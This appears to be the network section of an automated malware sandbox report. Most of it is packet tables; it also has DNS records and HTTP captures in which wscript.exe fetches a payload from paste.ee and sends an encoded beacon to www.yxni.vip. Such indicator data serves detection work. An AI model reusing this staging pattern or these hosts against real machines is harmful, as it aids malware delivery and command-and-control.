                                                                                                            Dec 3, 2024 10:07:03.621054888 CET49887443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:03.621064901 CET4434988713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:03.656454086 CET4434988313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:03.656867981 CET49883443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:03.656892061 CET4434988313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:03.657485008 CET49883443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:03.657490969 CET4434988313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:03.675594091 CET4434988413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:03.676016092 CET49884443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:03.676050901 CET4434988413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:03.676549911 CET49884443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:03.676554918 CET4434988413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:03.698323011 CET4434988613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:03.698684931 CET49886443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:03.698694944 CET4434988613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:03.699242115 CET49886443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:03.699245930 CET4434988613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.044034958 CET4434988513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.047678947 CET4434988513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.047780991 CET49885443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.047780991 CET49885443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.048086882 CET49885443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.048101902 CET4434988513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.050721884 CET49888443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.050765038 CET4434988813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.050848007 CET49888443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.050995111 CET49888443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.051006079 CET4434988813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.110131979 CET4434988313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.114881992 CET4434988313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.115084887 CET49883443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.115134954 CET49883443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.115134954 CET49883443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.115154028 CET4434988313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.115171909 CET4434988313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.121913910 CET49889443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.121953011 CET4434988913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.122046947 CET49889443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.122327089 CET49889443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.122348070 CET4434988913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.129204035 CET4434988413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.132292032 CET4434988413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.132523060 CET49884443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.132524014 CET49884443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.133280039 CET49884443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.133294106 CET4434988413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.135937929 CET49890443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.135972977 CET4434989013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.138609886 CET49890443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.138698101 CET49890443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.138712883 CET4434989013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.141706944 CET4434988613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.145425081 CET4434988613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.145739079 CET49886443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.145750046 CET4434988613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.145781040 CET49886443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.145786047 CET4434988613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.147766113 CET49891443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.147794008 CET4434989113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:04.149709940 CET49891443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.149889946 CET49891443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:04.149899960 CET4434989113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.336627960 CET4434988713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.337171078 CET49887443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:05.337203026 CET4434988713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.337816000 CET49887443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:05.337826014 CET4434988713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.772248030 CET4434988713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.774867058 CET4434988713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.774930954 CET49887443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:05.775434017 CET49887443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:05.775456905 CET4434988713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.775470972 CET49887443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:05.775476933 CET4434988713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.779771090 CET49892443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:05.779810905 CET4434989213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.779875994 CET49892443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:05.780206919 CET49892443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:05.780220985 CET4434989213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.832894087 CET4434988813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.834846020 CET49888443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:05.834858894 CET4434988813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.835439920 CET49888443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:05.835445881 CET4434988813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.918453932 CET4434989013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.918951035 CET49890443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:05.918970108 CET4434989013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.919410944 CET49890443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:05.919416904 CET4434989013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.944348097 CET4434989113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.945210934 CET49891443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:05.945210934 CET49891443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:05.945223093 CET4434989113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.945235014 CET4434989113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.968883991 CET4434988913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.969295979 CET49889443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:05.969305038 CET4434988913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:05.974437952 CET49889443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:05.974442959 CET4434988913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.277590036 CET4434988813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.280675888 CET4434988813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.280855894 CET49888443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.280878067 CET49888443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.280889034 CET4434988813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.280916929 CET49888443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.280921936 CET4434988813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.283462048 CET49893443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.283498049 CET4434989313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.283684969 CET49893443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.285237074 CET49893443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.285254002 CET4434989313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.363251925 CET4434989013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.366256952 CET4434989013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.366353989 CET49890443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.366377115 CET49890443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.366377115 CET49890443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.366385937 CET4434989013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.366394997 CET4434989013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.368499041 CET49894443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.368525028 CET4434989413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.368676901 CET49894443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.368751049 CET49894443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.368763924 CET4434989413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.389275074 CET4434989113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.389354944 CET4434989113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.389484882 CET49891443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.389484882 CET49891443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.389508009 CET49891443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.389525890 CET4434989113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.391568899 CET49895443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.391602039 CET4434989513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.391747952 CET49895443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.391798019 CET49895443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.391813040 CET4434989513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.423152924 CET4434988913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.426677942 CET4434988913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.426716089 CET4434988913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.426760912 CET49889443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.426829100 CET49889443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.426829100 CET49889443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.426882982 CET49889443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.426898003 CET4434988913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.428821087 CET49896443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.428848028 CET4434989613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:06.429028988 CET49896443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.429080009 CET49896443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:06.429095984 CET4434989613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:07.625722885 CET4434989213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:07.626199961 CET49892443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:07.626231909 CET4434989213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:07.626677036 CET49892443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:07.626682997 CET4434989213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.003959894 CET4434989313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.004506111 CET49893443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.004523039 CET4434989313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.004966021 CET49893443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.004971981 CET4434989313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.078975916 CET4434989213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.079032898 CET4434989213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.079082012 CET49892443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.079447031 CET49892443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.079463005 CET4434989213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.079474926 CET49892443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.079485893 CET4434989213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.082089901 CET49897443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.082134962 CET4434989713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.082473040 CET49897443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.082607985 CET49897443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.082623005 CET4434989713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.086384058 CET4434989413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.086704969 CET49894443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.086718082 CET4434989413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.087131977 CET49894443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.087148905 CET4434989413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.177695990 CET4434989513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.178155899 CET49895443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.178174973 CET4434989513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.178649902 CET49895443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.178654909 CET4434989513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.209783077 CET4434989613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.210613966 CET49896443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.210628033 CET4434989613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.211034060 CET49896443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.211040020 CET4434989613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.439445972 CET4434989313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.439471006 CET4434989313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.439517975 CET4434989313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.439519882 CET49893443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.439743996 CET49893443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.439799070 CET49893443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.439815044 CET4434989313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.439822912 CET49893443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.439827919 CET4434989313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.442595005 CET49898443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.442619085 CET4434989813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:07:08.442934990 CET49898443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.443095922 CET49898443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:07:08.443108082 CET4434989813.107.246.63192.168.2.4

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 3, 2024 10:04:56.259717941 CET5219553192.168.2.41.1.1.1
                                                                                                            Dec 3, 2024 10:04:56.607577085 CET53521951.1.1.1192.168.2.4
                                                                                                            Dec 3, 2024 10:05:02.588430882 CET6366553192.168.2.41.1.1.1
                                                                                                            Dec 3, 2024 10:05:02.914937019 CET53636651.1.1.1192.168.2.4
                                                                                                            Dec 3, 2024 10:06:02.307475090 CET5829553192.168.2.41.1.1.1
                                                                                                            Dec 3, 2024 10:06:02.937747955 CET53582951.1.1.1192.168.2.4

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Dec 3, 2024 10:04:56.259717941 CET192.168.2.41.1.1.10x4aebStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                            Dec 3, 2024 10:05:02.588430882 CET192.168.2.41.1.1.10x640eStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                            Dec 3, 2024 10:06:02.307475090 CET192.168.2.41.1.1.10xc760Standard query (0)www.yxni.vipA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Dec 3, 2024 10:04:56.607577085 CET1.1.1.1192.168.2.40x4aebNo error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                                                            Dec 3, 2024 10:04:56.607577085 CET1.1.1.1192.168.2.40x4aebNo error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                                                            Dec 3, 2024 10:05:02.914937019 CET1.1.1.1192.168.2.40x640eNo error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 3, 2024 10:05:02.914937019 CET1.1.1.1192.168.2.40x640eNo error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                                            Dec 3, 2024 10:05:02.914937019 CET1.1.1.1192.168.2.40x640eNo error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                                            Dec 3, 2024 10:05:02.914937019 CET1.1.1.1192.168.2.40x640eNo error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                                            Dec 3, 2024 10:05:02.914937019 CET1.1.1.1192.168.2.40x640eNo error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                                            Dec 3, 2024 10:05:18.006921053 CET1.1.1.1192.168.2.40xb909No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 3, 2024 10:05:18.006921053 CET1.1.1.1192.168.2.40xb909No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                            Dec 3, 2024 10:05:31.722245932 CET1.1.1.1192.168.2.40xfea1No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 3, 2024 10:05:31.722245932 CET1.1.1.1192.168.2.40xfea1No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                            Dec 3, 2024 10:05:55.764607906 CET1.1.1.1192.168.2.40x42e1No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 3, 2024 10:05:55.764607906 CET1.1.1.1192.168.2.40x42e1No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                            Dec 3, 2024 10:06:02.937747955 CET1.1.1.1192.168.2.40xc760No error (0)www.yxni.vip192.186.57.30A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • paste.ee
                                                                                                            • res.cloudinary.com
                                                                                                            • www.yxni.vip

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.449751192.186.57.30807296C:\Windows\System32\wscript.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 3, 2024 10:06:03.063219070 CET378OUTGET /skhs/?q2gYNc=YYGtc0vZDxBZaqOUfK8EjJlrwUEGCmw9C1cdleHi+lzAM/tSLZDkT6oQFAP0CoyED8RVRESu2LRjuGrjAaGK14wgZjrklmy8P/7KZtR3AGJqubIGbQJuqGM=&i7g0=S7yiJ01bbdLMH HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.yxni.vip
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36
                                                                                                            Dec 3, 2024 10:06:04.609683990 CET407INHTTP/1.1 404 Not Found
                                                                                                            Date: Tue, 03 Dec 2024 09:06:01 GMT
                                                                                                            Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9a
                                                                                                            Content-Length: 196
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                            HTTPS Proxied Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.449730104.21.84.674437296C:\Windows\System32\wscript.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-03 09:04:58 UTC319OUTGET /d/69SP6 HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-ch
                                                                                                            UA-CPU: AMD64
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                            Host: paste.ee
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-12-03 09:04:58 UTC1232INHTTP/1.1 200 OK
                                                                                                            Date: Tue, 03 Dec 2024 09:04:58 GMT
                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=2592000
                                                                                                            strict-transport-security: max-age=63072000
                                                                                                            x-frame-options: DENY
                                                                                                            x-content-type-options: nosniff
                                                                                                            x-xss-protection: 1; mode=block
                                                                                                            content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5HnA0obXo2Yoxh7YI1vj2G3sFLtH%2BhTIdJO9s0SeHgw5u0r2Ea%2BLek3c3xlyr0AcFwss1KYUUPL6ROFi3j%2BlzEhCUKvbRiTr221aTz9piV2GoyDTVx8MDOAjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ec2646d78abefa1-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-03 09:04:58 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 39 35 34 26 6d 69 6e 5f 72 74 74 3d 31 39 34 32 26 72 74 74 5f 76 61 72 3d 37 35 33 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 37 26 72 65 63 76 5f 62 79 74 65 73 3d 39 30 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 34 32 38 35 37 31 26 63 77 6e 64 3d 31 35 34 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 34 61 30 31 61 34 66 31 61 64 66 39 30 39 62 35 26 74 73 3d 38 33 37 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                            Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1954&min_rtt=1942&rtt_var=753&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=901&delivery_rate=1428571&cwnd=154&unsent_bytes=0&cid=4a01a4f1adf909b5&ts=837&x=0"
